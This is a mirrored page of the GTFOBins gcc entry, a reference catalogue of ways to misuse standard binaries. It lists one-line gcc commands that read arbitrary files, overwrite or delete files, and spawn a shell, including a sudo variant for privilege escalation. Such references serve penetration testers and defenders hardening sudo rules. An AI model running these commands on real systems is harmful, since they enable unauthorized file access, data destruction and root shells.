This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-08 00:21:34 +01:00
Code
Issues
1e3f00a04f
GTFOBins.github.io
/
_gtfobins
/
gcc.md
Andrea Cardaci
c3f37d9e09
Fix and simplify gcc file delete
2021-04-06 09:45:44 +02:00
326 B
Raw
Blame
History
functions
file-read
file-write
shell
sudo
code
LFILE=file_to_read gcc -x c -E "$LFILE"
code
LFILE=file_to_delete gcc -xc /dev/null -o $LFILE
code
gcc -wrapper /bin/sh,-s .
code
sudo gcc -wrapper /bin/sh,-s .